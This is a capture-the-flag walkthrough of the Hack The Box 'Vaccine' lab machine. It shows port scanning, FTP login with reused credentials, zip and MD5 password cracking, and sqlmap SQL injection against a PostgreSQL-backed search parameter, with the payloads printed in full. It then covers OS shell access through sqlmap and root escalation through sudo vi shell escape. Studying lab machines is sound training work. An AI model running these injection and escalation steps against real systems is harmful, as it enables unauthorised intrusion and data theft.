HTB Starting Point – Vaccine

kali@kali:~/ctf-tools$ ./portScan.sh

[+] 10.10.10.46 scan started...
[-] Open ports : 21,22,80 found
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 15:49 EDT
Nmap scan report for 10.10.10.46
Host is up (0.042s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.61 seconds
[+] 10.10.10.46 scan finished…
  • Remember we found a ftp user in the last machine 

Try ftpuser / mc@F1l3ZilL4 and we’ll access to this ftp

kali@kali:~/ctf-tools$ ftp 10.10.10.46

Connected to 10.10.10.46.
220 (vsFTPd 3.0.3)
Name (10.10.10.46:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> dir

200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0               2 Feb 03 11:23 a
-rw-r--r--    1 0        0            2533 Feb 03 11:27 backup.zip
226 Directory send OK.

ftp> get backup.zip

local: backup.zip remote: backup.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
226 Transfer complete.
2533 bytes received in 0.00 secs (22.7892 MB/s)
  • This file is password protected

kali@kali:~/htb/vaccine$ sudo zip2john backup.zip > hash

ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: 2b chk, TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: 2b chk, TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
  • zip2john processes input ZIP files into a format to be used with John the Ripper

kali@kali:~/htb/vaccine$ sudo john hash --fork=4 --wordlist="/opt/rockyou.txt"

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (backup.zip)
1 1g 0:00:00:00 DONE (2020-05-06 17:03) 100.0g/s 25600p/s 25600c/s 25600C/s football1..simpleplan
Waiting for 3 children to terminate
2 0g 0:00:00:00 DONE (2020-05-06 17:03) 0g/s 4656Kp/s 4656Kc/s 4656KC/s  derrickak47.abygurl69
4 0g 0:00:00:00 DONE (2020-05-06 17:03) 0g/s 4596Kp/s 4596Kc/s 4596KC/s  mar ..*7¡Vamos!
3 0g 0:00:00:00 DONE (2020-05-06 17:03) 0g/s 4596Kp/s 4596Kc/s 4596KC/s  brian89.a6_123
Use the "--show" option to display all of the cracked passwords reliably
Session completed
  • Different files are found inside the zip file.

Open index.php 

The password seems to be hashed. 

Let’s try to decrypt it. – https://www.md5online.org/md5-decrypt.html

Access to the site: http://10.10.10.46 and use the credentials we’ve obtained. (admin/qwerty789)

We arrive to this site: http://10.10.10.46/dashboard.php

  • Using the search textbox we find that params are sent using GET method (http://10.10.10.46/dashboard.php?search=test)
  • Using inspect functionality from Firefox we detect that a PHPSSEID is stored. 

Let’s try if this request can be exploited by sqlmap.

ruben@kali:~/ctf-tools$ sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=6u7ladfpr4j50t6otur3kl8ff3"

GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=a' AND (SELECT (CASE WHEN (4011=4011) THEN NULL ELSE CAST((CHR(119)||CHR(111)||CHR(115)||CHR(103)) AS NUMERIC) END)) IS NULL-- IYRB
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=a' AND 3130=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (3130=3130) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC)-- qZfx
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=a';SELECT PG_SLEEP(5)--
    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=a' AND 2980=(SELECT 2980 FROM PG_SLEEP(5))-- SbcV
---
[11:55:24] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[11:55:24] [INFO] fetched data logged to text files under '/home/ruben/.sqlmap/output/10.10.10.46'
[*] ending @ 11:55:24 /2020-05-08/
  • The page is vulnerable to multiple injections and the DBMS is PostgreSQL. 
  • To execute commands inside PostgreSQL can be performed using the –os-shell command.

kali@kali:~/ctf-tools$  sudo sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=8btur1o66svr5cr76mtve1pvnq" --os-shell

[*] starting @ 14:50:33 /2020-05-08/
[14:50:33] [INFO] resuming back-end DBMS 'postgresql' 
[14:50:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=a';SELECT PG_SLEEP(5)--
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: search=a' UNION ALL SELECT NULL,(CHR(113)||CHR(122)||CHR(113)||CHR(107)||CHR(113))||(CHR(112)||CHR(90)||CHR(70)||CHR(77)||CHR(107)||CHR(84)||CHR(112)||CHR(112)||CHR(115)||CHR(99)||CHR(118)||CHR(120)||CHR(84)||CHR(103)||CHR(119)||CHR(82)||CHR(70)||CHR(78)||CHR(113)||CHR(88)||CHR(77)||CHR(83)||CHR(100)||CHR(66)||CHR(116)||CHR(90)||CHR(85)||CHR(112)||CHR(109)||CHR(79)||CHR(69)||CHR(77)||CHR(115)||CHR(111)||CHR(81)||CHR(70)||CHR(119)||CHR(73)||CHR(107)||CHR(85))||(CHR(113)||CHR(118)||CHR(98)||CHR(118)||CHR(113)),NULL,NULL,NULL-- Csfu
---
[14:50:34] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[14:50:34] [INFO] fingerprinting the back-end DBMS operating system
[14:50:35] [INFO] the back-end DBMS operating system is Linux
[14:50:35] [INFO] testing if current user is DBA
[14:50:35] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[14:50:35] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>

Using: https://github.com/florianges/-HTB-Vaccine_sql_injection

SHELL=/bin/bash script -q /dev/null

postgres@vaccine:/var/lib/postgresql/11/main$

postgres@vaccine:/var/lib/postgresql/11/main$ cd /var/www/html     

cd /var/www/html
postgres@vaccine:/var/www/html$ ls 
ls
bg.png        dashboard.js   index.php    style.css
dashboard.css  dashboard.php  license.txt
postgres@vaccine:/var/www/html$

postgres@vaccine:/var/www/html$ cat dashboard.php

try {
  $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
}

postgres@vaccine:/var/www/html$ python3 -c "import pty;pty.spawn('/bin/bash')"

python3 -c "import pty;pty.spawn('/bin/bash')"

postgres@vaccine:/var/www/html$ sudo -l

[sudo] password for postgres: P@s5w0rd!
Matching Defaults entries for postgres on vaccine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

We just can run this command: /bin/vi /etc/postgresql/11/main/pg_hba.conf

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

  • Once vi is started is possible to run an external command (we started the app with sudo)
  • :! option is used to run a command inside vi

 :!/bin/bash

root@vaccine:/etc/postgresql/11/main# id

uid=0(root) gid=0(root) groups=0(root)

root@vaccine:/etc/postgresql/11/main# cd
root@vaccine:~# pwd

/root

root@vaccine:~# ls

pg_hba.conf  root.txt  snap

root@vaccine:~# cat root.txt

dd6eXXXXXXXXXXXXXXXXXXXXXXXXXXXX